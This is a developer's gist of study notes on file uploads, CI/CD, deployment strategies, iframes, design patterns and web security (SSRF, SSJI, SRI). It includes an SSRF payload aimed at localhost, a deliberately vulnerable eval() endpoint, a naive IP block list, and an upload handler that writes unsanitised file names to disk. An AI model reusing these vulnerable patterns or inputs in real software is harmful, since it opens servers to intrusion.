🔹 Viewport Meta Tag ()
<meta name="viewport" content="width=device-width, initial-scale=1">


1. Technical SEO

Improve Site Speed:

  • Use a CDN (Content Delivery Network).
  • Optimize images (use WebP format, compress large files).
  • Minify CSS, JavaScript, and HTML.
  • Enable lazy loading for images.
  • Implement caching using tools like Redis or browser cache.

2. On-Page SEO

Optimize Images with Alt Text:

  • Use descriptive alt text for images to improve accessibility and SEO.

Improve URL Structure:

  • Keep URLs short and keyword-rich (/best-seo-tips instead of /post123).

Use Internal Linking Strategically:

  • Link to relevant pages using anchor text to improve navigation and SEO.

Use HTML Semantic tags like main, section, header:

@yogain123
Copy link
Author

yogain123 commented Feb 6, 2025

Base64 Vs Binary Images from Frontend

  • In FormData - Direct BLOB (Binary Large Object) is sent to BE
  • In Base64 - BLOB (Binary Large Object) is converted to Base64 and then sent in body

To send a file from your React frontend to the backend in Base64 format, follow these steps:


Frontend (React) - Convert File to Base64 & Send via Fetch

  1. Select a file using an <input> element.
  2. Convert the file to Base64 using FileReader.
  3. Send the Base64 string in the request body.

React Code (Frontend)

import React, { useState } from "react";

const FileUpload = () =&gt; {
  const [fileBase64, setFileBase64] = useState("");

  const handleFileChange = (event) =&gt; {
    const file = event.target.files[0];
    if (!file) return;

    const reader = new FileReader();
    reader.readAsDataURL(file); // Convert to Base64
    reader.onload = () =&gt; {
      setFileBase64(reader.result.split(",")[1]); // Remove the data type prefix
    };
  };

  const handleUpload = async () =&gt; {
    if (!fileBase64) {
      alert("Please select a file first.");
      return;
    }

    const payload = {
      fileName: "example.png", // Can be dynamic
      fileData: fileBase64, // The actual Base64 content
    };

    try {
      const response = await fetch("http://localhost:5000/upload", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(payload),
      });

      const result = await response.json();
      console.log("Upload success:", result);
    } catch (error) {
      console.error("Upload failed:", error);
    }
  };

  return (
    &lt;div&gt;
      &lt;input type="file" onChange={handleFileChange} /&gt;
      &lt;button onClick={handleUpload}&gt;Upload&lt;/button&gt;
    &lt;/div&gt;
  );
};

export default FileUpload;

Backend (Node.js with Express) - Decode Base64 & Save the File

Your backend should:

  1. Accept a JSON payload with fileData (Base64 string) and fileName.
  2. Decode Base64 to binary.
  3. Save the file to disk.

Node.js + Express Backend

const express = require("express");
const fs = require("fs");
const path = require("path");
const app = express();
const PORT = 5000;

// Middleware to parse JSON
app.use(express.json({ limit: "10mb" })); // Increase limit if needed

app.post("/upload", async (req, res) =&gt; {
  try {
    const { fileName, fileData } = req.body;

    if (!fileName || !fileData) {
      return res.status(400).json({ message: "Missing file data" });
    }

    // Convert Base64 to Buffer
    const buffer = Buffer.from(fileData, "base64");

    // Define file path
    const filePath = path.join(__dirname, "uploads", fileName);

    // Ensure uploads directory exists
    if (!fs.existsSync("uploads")) {
      fs.mkdirSync("uploads");
    }

    // Save file
    fs.writeFileSync(filePath, buffer);
    
    res.json({ message: "File uploaded successfully", filePath });
  } catch (error) {
    res.status(500).json({ message: "Error uploading file", error });
  }
});

app.listen(PORT, () =&gt; {
  console.log(`Server running on http://localhost:${PORT}`);
});

How It Works

  1. User selects a file in the React UI.
  2. The file is converted to Base64 using FileReader.
  3. React sends the Base64 string to the backend via fetch().
  4. The backend:
    • Receives the Base64 string.
    • Decodes it into binary format.
    • Saves the file to the uploads directory.

Alternative Approach (FormData)

If your backend does not require Base64, it's more efficient to use FormData (sends the file as binary):

React - Send as FormData

const handleUpload = async () =&gt; {
  const formData = new FormData();
  formData.append("file", selectedFile);

  const response = await fetch("http://localhost:5000/upload", {
    method: "POST",
    body: formData,
  });

  const result = await response.json();
  console.log("Upload success:", result);
};

Backend - Express with Multer

const multer = require("multer");
const upload = multer({ dest: "uploads/" });

app.post("/upload", upload.single("file"), (req, res) =&gt; {
  res.json({ message: "File uploaded", filePath: req.file.path });
});

FileReader In details

import React, { useState } from "react";
import "./App.css";

function App() {
  const [fileData, setFileData] = useState({
    arrayBuffer: null,
    dataUrl: null,
    text: null,
  });

  const handleFileChange = (event) => {
    const file = event.target.files[0];

    // For ArrayBuffer - for images etc - non text
    const reader1 = new FileReader();
    reader1.onload = (e) => {
      setFileData((prev) => ({ ...prev, arrayBuffer: e.target.result }));
    };
    reader1.readAsArrayBuffer(file);

    // For DataURL -> to show on UI directly
    const reader2 = new FileReader();
    reader2.onload = (e) => {
      setFileData((prev) => ({ ...prev, dataUrl: e.target.result }));
    };
    reader2.readAsDataURL(file);

    // For Text - for text file like csv, .json, .js , .txt etc
    const reader3 = new FileReader();
    reader3.onload = (e) => {
      setFileData((prev) => ({ ...prev, text: e.target.result }));
    };
    reader3.readAsText(file);
  };

  return (
    <div>
      <input type="file" onChange={handleFileChange} />

      {fileData.dataUrl && (
        <img
          src={fileData.dataUrl}
          alt="Preview"
          style={{ maxWidth: "300px" }}
        />
      )}

      {fileData.text && <pre>{fileData.text}</pre>}

      {fileData.arrayBuffer && (
        <p>File size in bytes: {fileData.arrayBuffer.byteLength}</p>
      )}
    </div>
  );
}

export default App;

multipart talks

Why Do We Use multipart/form-data in Headers for File Uploads?

When uploading files via FormData, we set the request header as Content-Type: multipart/form-data. This is necessary because the file needs to be sent in a format that the server can properly parse and process.


Does This Mean the File Is Sent in Chunks?

Yes and No

  • Yes, because multipart/form-data splits the request body into multiple parts (text fields + files) using a boundary string.
  • No, because it's not "chunked" like streaming; instead, the entire file is still part of a single HTTP request.

How Does multipart/form-data Work?

  1. Each part of the request (including the file) is separated by a unique boundary string.
  2. The file is sent as raw binary data within the body, making it more efficient than encoding it into base64.
  3. The server extracts the file and other fields based on the boundaries.

Example of multipart/form-data Request Body

When you send a file using FormData, your request body looks something like this:

------WebKitFormBoundaryXyz
Content-Disposition: form-data; name="username"

JohnDoe
------WebKitFormBoundaryXyz
Content-Disposition: form-data; name="file"; filename="image.png"
Content-Type: image/png

(binary file data here)
------WebKitFormBoundaryXyz--

  • Each part has a header (e.g., Content-Disposition) that tells the server what the field represents.
  • The file is sent as raw binary data, not encoded (which keeps it small and fast).
  • The boundary string (------WebKitFormBoundaryXyz) separates parts of the request.

@yogain123
Copy link
Author

HLD - Ticket Booking System

Ticket Booking System - https://excalidraw.com/#json=yjZFXJdRdHu4e4R2-n-9C,AoIqj9Gia_F-MRl8ZJxA0A

@yogain123
Copy link
Author

CI/CD Process

Screenshot 2025-02-08 at 11 45 02 AM

CI/CD in Frontend Development (Explained in Detail & Easy Manner)

CI/CD stands for Continuous Integration (CI) and Continuous Deployment (CD). It is a process that helps developers automate testing and deployment so that code changes can be delivered quickly, safely, and efficiently.


1. Understanding CI (Continuous Integration)

What is CI?

CI is the process where developers frequently push code to a shared repository (like GitHub, GitLab, or Bitbucket). Every time code is pushed, it is automatically built, tested, and verified to ensure nothing breaks.

Steps in CI (Frontend Perspective)

🔹 Step 1: Developer Writes Code

  • You make changes in your frontend code (React, Angular, Vue, etc.).
  • You push the code to a Git repository (e.g., GitHub).

🔹 Step 2: Automated Build Process

  • CI tools (Jenkins, GitHub Actions, GitLab CI, CircleCI) detect the new changes.
  • The build process starts (e.g., Webpack, Vite, Babel compile the code).
  • If there are errors, the build fails immediately.

🔹 Step 3: Automated Testing

  • Runs unit tests (e.g., Jest, Mocha, Cypress for frontend).
  • Runs linting checks (ESLint, Prettier).
  • Runs static code analysis (SonarQube, CodeClimate).
  • If tests pass, the process continues. Otherwise, developers fix issues.

CI ensures every new code change is verified, tested, and bug-free before merging.


2. Understanding CD (Continuous Deployment/Delivery)

What is CD?

CD is the process of automatically deploying the tested and verified code to a staging or production environment.

There are two variations:

  1. Continuous Delivery – Code is deployed to a staging environment, but deployment to production requires manual approval.
  2. Continuous Deployment – Code is automatically deployed to production without manual approval.

Steps in CD (Frontend Perspective)

🔹 Step 4: Deployment to Staging

  • Once CI is successful, the code is deployed to a staging environment.
  • Staging is a testing ground that mimics production.

🔹 Step 5: Manual or Automated Approval for Production

  • If the company uses Continuous Delivery, a human approves before deploying to production.
  • If using Continuous Deployment, the system automatically deploys.

🔹 Step 6: Deployment to Production

  • The frontend code is uploaded to a CDN (e.g., Cloudflare, AWS S3 + CloudFront, Vercel, Netlify).
  • The application is now live for users!

CD ensures that the latest changes reach users quickly and safely.


4. Real-Life Frontend CI/CD Example with GitHub Actions

name: CI/CD Pipeline

on:
  push:
    branches:
      - main  # Runs on main branch push

jobs:
  build_and_test:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout Code
        uses: actions/checkout@v2

      - name: Install Dependencies
        run: npm install

      - name: Run Linter
        run: npm run lint

      - name: Run Tests
        run: npm run test

      - name: Build Application
        run: npm run build

  deploy:
    needs: build_and_test
    runs-on: ubuntu-latest
    steps:
      - name: Deploy to S3
        run: aws s3 sync ./build s3://my-frontend-bucket --delete

This workflow automatically builds, tests, and deploys frontend code!

@yogain123
Copy link
Author

Deployments

What Exactly Happens During Deployment in CI/CD?

You already understand CI (Continuous Integration)—it handles build, testing, and linting. Now, let’s go deep into CD (Continuous Deployment/Delivery) and understand what happens internally when we deploy React (frontend), Node.js (backend), CDN (static assets), and Database changes.


1. What is Deployment Actually Doing?

When we say, "Deploy to staging (stg) or production (prod)," the process involves:
Packing the app (React build, Node.js files, DB migrations).
Uploading to a hosting platform (AWS, Vercel, Netlify, Docker, Kubernetes).
Updating services (backend API servers, CDN assets, databases).
Switching traffic (blue-green deployment, canary release, etc.).


2. Deployment Internals for React (Frontend Apps)

Scenario: Deploying a React app to AWS S3 + CloudFront

Step-by-Step Internal Process

1️⃣ The Build is Uploaded to a Storage Bucket (AWS S3, Vercel, Netlify, Firebase Hosting)

  • When you run npm run build, React creates a build/ folder with:
    build/
    ├── index.html
    ├── static/
        ├── js/ (hashed JS files)
        ├── css/ (hashed CSS files)
        ├── media/ (optimized images)
    
  • These files are uploaded to AWS S3 or another hosting provider.
    aws s3 sync build/ s3://my-react-app --delete

2️⃣ CDN (CloudFront, Vercel) Caches and Distributes the Files

  • The CDN caches these files across global edge locations.
  • If an old version exists, we invalidate the cache to force updates:
    aws cloudfront create-invalidation --distribution-id ABC123 --paths "/*"
  • This ensures users always get the latest frontend code.

3️⃣ DNS & Routing Updates

  • If using Vercel or Netlify, the deployment happens automatically, and the domain is updated.
  • If using AWS Route 53 (custom domain), we update DNS to point to the latest CloudFront distribution.

Now, when users visit the website, they fetch the latest React files via CDN.


3. Deployment Internals for Node.js (Backend)

Scenario: Deploying a Node.js API (Express.js, NestJS, or Next.js SSR) to AWS EC2

Step-by-Step Internal Process

1️⃣ Package the Code as a Deployable Unit

  • If using plain Node.js, we package the files and node_modules (or use Docker).
  • If using TypeScript, we compile it (tsc generates JS files).

2️⃣ Upload to a Remote Server

  • Using SSH & SCP (manual method):
    scp -r ./dist user@server:/var/www/myapp
  • Using AWS Elastic Beanstalk / Lambda / Docker:
    eb deploy    # Elastic Beanstalk

3️⃣ Start the Node.js Process

  • If using PM2 (Process Manager):
    pm2 start server.js --name "backend"
  • If using Docker, pull the latest image:
    docker pull my-backend:latest
    docker run -d -p 3000:3000 my-backend

4️⃣ Configure Load Balancer and Traffic Routing

  • If using Nginx or AWS ALB, it routes traffic to the Node.js instance.
  • If using Kubernetes, the Ingress Controller updates the routing.

Now, the backend API is live, and client requests are served by the latest Node.js version.

@yogain123
Copy link
Author

yogain123 commented Feb 8, 2025

Deployment Strategies: Rolling Update vs. Canary Deployment vs Blue Green Deployment

When deploying new versions of an application, we need strategies to ensure zero downtime, smooth rollouts, and safe rollbacks in case of failure. Two common deployment strategies are Rolling Updates and Canary Deployments and Blue, Green Deployment


1️⃣ Rolling Update

What is a Rolling Update?

A Rolling Update replaces old application instances gradually, without taking down the entire service.

How It Works?

  1. A new version of the app (v2) is deployed gradually, replacing instances of the old version (v1).
  2. New instances are started, while old instances are terminated in batches.
  3. Traffic is always available because at least some instances are running.
  4. If an issue is detected, the update can be paused or rolled back.

Example: Rolling Update in Kubernetes

Kubernetes updates pods one by one (or in batches) while keeping the service running.

Deployment YAML

apiVersion: apps/v1
kind: Deployment
metadata:
  name: my-app
spec:
  replicas: 4  # 4 instances running
  strategy:
    type: RollingUpdate
    rollingUpdate:
      maxUnavailable: 1  # At most 1 pod down at a time
      maxSurge: 1  # Add at most 1 new pod at a time
  template:
    spec:
      containers:
        - name: app
          image: my-app:v2  # New version of the app

🚀 What Happens?

  • Step 1: One old pod (v1) is terminated.
  • Step 2: A new pod (v2) is started.
  • Step 3: Repeat until all pods are updated.
  • If an error occurs? Rollback to my-app:v1.

When to Use Rolling Updates?

✔️ Works well if new updates are safe (e.g., UI fixes, minor API changes).
✔️ Ensures zero downtime and smooth rollouts.
❌ If a bug exists in the new version, all instances will eventually have the issue before it's detected.


2️⃣ Canary Deployment

What is Canary Deployment?

A Canary Deployment releases the new version to a small percentage of users first. If everything is stable, the update gradually rolls out to more users.

How It Works?

  1. Deploy v2 to 5% of users while keeping 95% on v1.
  2. Monitor logs, errors, and performance.
  3. If v2 is stable, increase traffic (e.g., 25%, 50%, 100%).
  4. If v2 has issues, rollback to v1 before affecting all users.

Example: Canary Deployment with Nginx

We use Nginx to send only 5% of requests to the new version.

upstream old_version {
  server old-app.example.com;
}

upstream new_version {
  server new-app.example.com;
}

server {
  listen 80;
  
  location / {
    set $canary_weight 5;  # 5% of traffic goes to new version
    if ($request_id ~* "^.{0,$canary_weight}1") {
      proxy_pass http://new_version;
    }
    proxy_pass http://old_version;
  }
}

🔹 Blue-Green Deployment (Zero-Downtime Deployment Strategy)

1️⃣ What is Blue-Green Deployment?

Blue-Green Deployment is a zero-downtime deployment strategy where you have two identical environments:

  • 🔵 Blue (Current Live Version)
  • 🟢 Green (New Version Ready for Deployment)

At any time, only one of them is live. When the new version (Green) is ready, traffic is switched instantly from Blue to Green. If issues occur, you can rollback instantly by switching traffic back to Blue.


2️⃣ How Blue-Green Deployment Works?

1️⃣ Run two environments (Blue & Green)

  • Blue serves live traffic.
  • Green runs the new version but does not get live traffic yet.

2️⃣ Test the Green Environment

  • Perform integration tests and monitor logs.
  • Ensure the new version (Green) is stable.

3️⃣ Switch Traffic to Green

  • Modify Load Balancer (NGINX, AWS ALB, Kubernetes Ingress, etc.)
  • Users now access Green instead of Blue.

4️⃣ Keep Blue as a Backup

  • If an issue arises, switch back to Blue instantly.

5️⃣ Delete Blue (Optional)

  • If Green is stable, delete Blue or use it for the next release.

3️⃣ Real-World Example: Blue-Green Deployment

🔹 Example 1: Blue-Green Deployment in AWS (Using ALB)

Amazon Web Services (AWS) Application Load Balancer (ALB) allows traffic switching.

  • Step 1: Deploy Blue (v1) on EC2 / ECS / Kubernetes.
  • Step 2: Deploy Green (v2) on a separate instance.
  • Step 3: Test Green using a temporary staging URL.
  • Step 4: When Green is stable, update ALB Target Group to redirect all traffic to Green.
  • Step 5: If issues occur, switch back to Blue instantly.

@yogain123
Copy link
Author

yogain123 commented Feb 9, 2025

Iframe Access

If you want to access the parent window from an iframe, you can use:

window.parent

If you want to access a child iframe from the parent window, you can use:

iframeElem.contentWindow

Important Note:

Direct access between the parent and child iframe is only possible if both are on the same domain. If they are on different domains, the postMessage API is used to securely send and receive messages.

Example using postMessage:

Parent Window (parent.html):

<!DOCTYPE html>
<html lang="en">
<head>
    <title>Parent Window</title>
</head>
<body>
    <iframe id="myIframe" src="child.html" width="400" height="200"></iframe>
    
    <button onclick="sendMessage()">Send Message to Iframe</button>
    
    <script>
        const iframe = document.getElementById("myIframe");

        function sendMessage() {
            iframe.contentWindow.postMessage("Hello from Parent!", "*"); // Sending message
        }

        window.addEventListener("message", (event) => {
            if (event.origin !== "https://trusted-domain.com") return; // Security check
            console.log("Received from iframe:", event.data);
        });
    </script>
</body>
</html>

Child Iframe (child.html):

<!DOCTYPE html>
<html lang="en">
<head>
    <title>Child Iframe</title>
</head>
<body>
    <script>
        window.addEventListener("message", (event) => {
            if (event.origin !== "https://trusted-domain.com") return; // Security check
            console.log("Received from parent:", event.data);

            // Sending response back to parent
            event.source.postMessage("Hello from Iframe!", event.origin);
        });
    </script>
</body>
</html>

This ensures secure communication between different domains using postMessage.

@yogain123
Copy link
Author

yogain123 commented Feb 9, 2025

Design patterns

Design patterns help you write clean, maintainable, and efficient code by following best practices.
It's an approach/solutions to some of the common problems faced

In JavaScript and General Front-End

  1. Module Pattern

    • What It Is: A way to organize code into self-contained “modules” that keep details private and only expose what’s necessary.
    • Why It’s Useful: It prevents global variables from cluttering the environment and makes code easier to maintain.
    • Example:
      // Using an IIFE (Immediately Invoked Function Expression)
      const myModule = (function() {
        const privateVar = "I am hidden";
        function privateFunc() {
          console.log(privateVar);
        }
        return {
          publicFunc: function() {
            privateFunc();
          }
        };
      })();
      
      myModule.publicFunc(); // Logs: I am hidden
  2. Observer Pattern

    • What It Is: A pattern where one piece of code (the "subject") keeps a list of dependents ("observers") and notifies them automatically of any changes or events.
    • Why It’s Useful: It’s great for handling events and updating parts of your application when something changes.
    • Example:
      class EventEmitter {
        constructor() {
          this.events = {};
        }
        subscribe(event, listener) {
          if (!this.events[event]) {
            this.events[event] = [];
          }
          this.events[event].push(listener);
        }
        emit(event, data) {
          if (this.events[event]) {
            this.events[event].forEach(listener => listener(data));
          }
        }
      }
      
      const emitter = new EventEmitter();
      emitter.subscribe('greet', message => console.log(message));
      emitter.emit('greet', 'Hello, world!'); // Logs: Hello, world!
  3. Singleton Pattern

    • What It Is: A design that restricts a class to a single instance.
    • Why It’s Useful: When you need one central object (like a configuration or a state manager) that is shared across your application.
    • Example:
      const Singleton = (function() {
        let instance;
        function createInstance() {
          return { timestamp: new Date() };
        }
        return {
          getInstance: function() {
            if (!instance) {
              instance = createInstance();
            }
            return instance;
          }
        };
      })();
      
      const obj1 = Singleton.getInstance();
      const obj2 = Singleton.getInstance();
      console.log(obj1 === obj2); // true
  4. Factory Pattern

    • What It Is: A way to create objects without specifying the exact class of the object that will be created.
    • Why It’s Useful: It allows you to centralize object creation and can help in managing different types of objects based on input.
    • Example:
      function carFactory(type) {
        if (type === "sedan") {
          return { wheels: 4, type: "sedan" };
        } else if (type === "truck") {
          return { wheels: 6, type: "truck" };
        }
      }
      
      const myCar = carFactory("sedan");
      console.log(myCar); // { wheels: 4, type: "sedan" }

@yogain123
Copy link
Author

GDPR and PCI DSS

GDPR -> General Data Protection Regulation
PCI DSS -> Payment Card Industry Data Security Standard

GDPR:

  • Requires clear user consent and transparency in data collection.
  • Empowers users with rights to access, modify, or delete their data.
  • Enforces secure data storage and strict privacy practices.

PCI DSS:

  • Mandates secure handling and encryption of payment card data.
  • Requires robust network security measures (firewalls, regular scans).
  • Involves periodic audits to ensure ongoing compliance.

In Short: Both standards push you to implement strong security and privacy measures, but they also increase the development and maintenance effort to avoid hefty fines and legal issues.

@yogain123
Copy link
Author

yogain123 commented Feb 10, 2025

Service Side Resource Forgery

What is SSRF?

  • SSRF (Server-Side Request Forgery) is when an attacker tricks a server into making unintended requests.
  • How it works: The attacker sends a malicious URL to the server, which then fetches that URL, often accessing internal or protected systems.

How Attackers Exploit SSRF:

  • They force the server to access internal resources (like 127.0.0.1, 10.x.x.x, etc.) or cloud services (e.g., metadata endpoints).
  • This can reveal sensitive information or allow further attacks.

Prevention Methods:

  • Input Validation: Only allow trusted URLs (whitelisting) and block internal IP addresses (e.g., 127.0.0.1, 192.168.x.x, etc.).
  • Network Restrictions: Use firewall rules to limit outbound requests.
  • Protocol Restrictions: Allow only necessary protocols (e.g., HTTP/HTTPS).
  • Secure Proxies: Route requests through controlled, secure proxies.
  • Regular Updates: Keep all software and libraries up-to-date.

Here's a concrete example to illustrate SSRF:

Scenario: Image Fetching Feature

The Setup:
Imagine a website that lets users add a profile picture by providing an image URL. When a user submits the URL, the server fetches the image from that URL to display it on the profile.

How It Could Go Wrong (SSRF Exploit):

  1. User Input:

    • A legitimate user enters: http://example.com/picture.jpg
    • The server fetches and displays the image.
  2. Attacker Input:

    • An attacker instead enters: http://127.0.0.1/admin
    • The server, following the same process, makes a request to http://127.0.0.1/admin—an internal address.
    • Result: The server might retrieve sensitive internal data or perform actions meant only for internal use, exposing confidential information.

Prevention Techniques in This Example

  1. Input Validation:

    • Whitelist URLs: Only allow URLs from trusted external domains.
    • Block Internal Addresses: Reject any URLs that point to internal IP addresses like 127.0.0.1, 192.168.x.x, or 10.x.x.x.
  2. Network Restrictions:

    • Configure firewall rules or server settings to prevent outgoing requests to internal IP ranges.
  3. Protocol Filtering:

    • Ensure that only the necessary protocols (e.g., HTTP/HTTPS) are allowed in the URLs.

Pseudocode Example

function fetchImage(url) {
  // Simple check to block internal IP addresses
  if (url.includes("127.0.0.1") || url.includes("192.168.") || url.includes("10.")) {
    throw new Error("Access to internal resources is not allowed.");
  }
  
  // Proceed to fetch the image if the URL is safe
  return http.get(url);
}

@yogain123
Copy link
Author

yogain123 commented Feb 10, 2025

SSJI (Server-Side JavaScript Injection)

SSJI (Server-Side JavaScript Injection) occurs when user input is directly executed as JavaScript code on the server. This can allow attackers to run arbitrary code with the same privileges as the server process.

Short Example

app.get('/', (req, res) => {
  // The server expects a simple arithmetic expression from the user
  const userCode = req.query.code; // e.g., "2+2"

  // Vulnerable: Directly evaluating user input
  const result = eval(userCode);
  res.send(`Result: ${result}`);
});

Risk:
If an attacker passes malicious code (e.g., process.exit(1)), they can disrupt or compromise the server by executing unwanted commands.


How to prevent it

  1. Avoid Dynamic Code Execution: Don’t use eval or similar functions on untrusted input.
  2. Validate & Sanitize Inputs: Only allow expected characters/data (whitelisting) to prevent injection.
  3. Use Safe Libraries: Utilize libraries (e.g., math.js for arithmetic) that safely parse and evaluate expressions.
  4. Sandbox Execution: If dynamic evaluation is needed, run code in a restricted environment (e.g., Node’s vm module with strict limitations).

@yogain123
Copy link
Author

SRI - SubResource Integrity

SubResource Integrity (SRI) is a security feature that allows browsers to verify that external resources—such as JavaScript files, CSS files, or other assets—have not been tampered with during transit.

How SRI Works:

  • Hashing the Resource: When you include an external resource, you generate a cryptographic hash (using algorithms like SHA-256, SHA-384, or SHA-512) of the file’s contents.
  • Adding the Integrity Attribute: You then include this hash in your HTML markup using the integrity attribute within the <script> or tag.
  • Browser Verification: When the browser fetches the resource, it computes the hash of the downloaded file and compares it with the hash provided in the integrity attribute.
  • Action Based on Match: If the hashes match, the browser proceeds to use the resource. If they don’t, the browser blocks the resource from executing or rendering, thereby protecting the user from potentially malicious modifications.
<script src="https://example.com/script.js"
        integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxo7DS7FK5U4IuEKJvU03kJjgVnIDT+"
        crossorigin="anonymous"></script>

How hash is generated
Suppose you have a file script.js:

  • You read the entire contents of script.js.
  • You run the content through a hash function like SHA-256.
  • The resulting hash (in binary) is then Base64-encoded to produce a string.
  • This string is then placed in your HTML tag as follows:
<script src="https://example.com/script.js"
        integrity="sha256-Base64EncodedHashValue"
        crossorigin="anonymous"></script>

In summary, the hash is generated solely from the file's content using a secure, standardized cryptographic hash function. This ensures that the browser can verify the integrity of the resource by re-computing the hash when the file is loaded and comparing it to the one provided in the HTML.

@yogain123
Copy link
Author

All Security

IFrame Attack
CSP - Content Security Policy

XSS/CSRF - Cross Site Scripting - Client Side Resource Fourgery

SSRF - Server Side Resource Fourgery
SSJI - Server Side JavaScript Injection

SRI- SubResource Integrity

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment